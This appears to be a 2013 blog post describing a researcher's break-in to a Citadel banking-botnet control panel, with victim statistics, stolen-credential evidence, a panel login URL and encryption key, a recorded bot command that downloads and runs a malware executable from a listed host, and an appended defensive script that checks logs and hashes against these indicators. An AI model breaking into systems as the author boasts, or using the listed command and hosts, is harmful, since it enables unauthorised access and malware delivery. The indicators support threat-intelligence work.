Sunday, December 29, 2013

Citadel C&C hosted on 173.242.112.135

Doing more work on the botnet command & control servers listed on ZeuS Tracker.

Citadel C&C
173.242.112.135 - VolumeDrive US
Citadel bot v.1.3.5.1
90% of bots located in India.
Evidence of stolen banking credentials.

This server panel is offline now, and it's been removed from ZeuS Tracker, so it's OK to publish details about it.


Original ZeuS Tracker page:



Admin panel login:
http://173.242.112.135/office/obi/server/cp.php?m=login



and kick the door down..


Summary:


205 bots
(143 India)


first page of bot details: 
(is that your IP?)


Evidence of stealing credentials.
Facebook.com
ebs.ca-egypt.com (Crédit Agricole Egypt - Online Banking ePayroll System)





Here are some OS statistics to show what systems get infected.
XP, Win7, Win7 x64 and Server 2008 x64

Fun fact:
AntiVirus software is commonly seen running in memory alongside the bot exe. :-)



Some options:
encryption key: obi





The guy was in the process of updating when I broke in. Oops, sorry about that.



user_execute hxxp://142.0.36.226/office/nh.exe 

(volumedrive again, US PA - get your shit together)

more details on this host (142.0.36.226) later..

nh.exe - MD5 cf2cfc5354b62dc0d9bf42a0a3841437
VirusTotal detection: 5 of 48

malware phones home to:
185.24.233.5 (Ireland)
but the server has already been seen: https://zeustracker.abuse.ch/monitor.php?host=185.24.233.5

Interesting ports on 185.24.233.5:
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1720/tcp filtered H.323/Q.931
3389/tcp open ms-term-serv

Win2k8 R2 Std
Home base for this h4x0r fucker..more on this detail later.
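For anyone who wants to check their own proxy logs and host inventory against the indicators listed above (the three server IPs, the panel and download paths, and the nh.exe MD5), here is an added example that is not part of the original post. The log layout and the sample lines are constructed for this example; only the indicator values come from the write-up.

```python
import re

# Indicators copied from the write-up above (page values, not invented).
CITADEL_HOSTS = {"173.242.112.135", "142.0.36.226", "185.24.233.5"}
CITADEL_PATHS = {"/office/obi/server/cp.php", "/office/nh.exe"}
NH_EXE_MD5 = {"cf2cfc5354b62dc0d9bf42a0a3841437"}

# Assumed proxy log layout (constructed for this example):
#   <timestamp> <client-ip> <method> <url> <status>
LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d{3})$")
URL_RE = re.compile(r"^https?://([^/:?]+)(?::\d+)?(/[^?#]*)?")

def classify_request(line):
    """Return a hit dict if the proxy line touches a known indicator, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, client, _method, url, _status = m.groups()
    u = URL_RE.match(url)
    if not u:
        return None
    host, path = u.group(1), u.group(2) or "/"
    reasons = []
    if host in CITADEL_HOSTS:
        reasons.append("known Citadel host " + host)
    if path in CITADEL_PATHS:
        reasons.append("known Citadel path " + path)
    return {"time": ts, "client": client, "host": host, "reasons": reasons} if reasons else None

def scan_proxy_log(lines):
    return [hit for hit in map(classify_request, lines) if hit]

def find_nh_exe(md5_by_path):
    """Match collected file hashes (any case) against the nh.exe sample hash."""
    return sorted(p for p, h in md5_by_path.items() if h.lower() in NH_EXE_MD5)

# Constructed sample data: a check-in, the nh.exe fetch, a benign request, a panel visit.
SAMPLE_LOG = [
    "2013-12-29T10:01:02Z 10.0.0.15 POST http://185.24.233.5/ 200",
    "2013-12-29T10:01:05Z 10.0.0.15 GET http://142.0.36.226/office/nh.exe 200",
    "2013-12-29T10:02:40Z 10.0.0.22 GET http://www.example.com/index.html 200",
    "2013-12-29T10:03:11Z 10.0.0.15 GET http://173.242.112.135/office/obi/server/cp.php?m=login 302",
]
SAMPLE_HASHES = {  # constructed paths; second hash is a placeholder, not a real file
    r"C:\Users\victim\AppData\Local\Temp\nh.exe": "CF2CFC5354B62DC0D9BF42A0A3841437",
    r"C:\Windows\System32\notepad.exe": "0000000000000000000000000000dead",
}

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit["time"], hit["client"], "->", hit["host"], "|", "; ".join(hit["reasons"]))
    print("nh.exe found at:", find_nh_exe(SAMPLE_HASHES))
```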

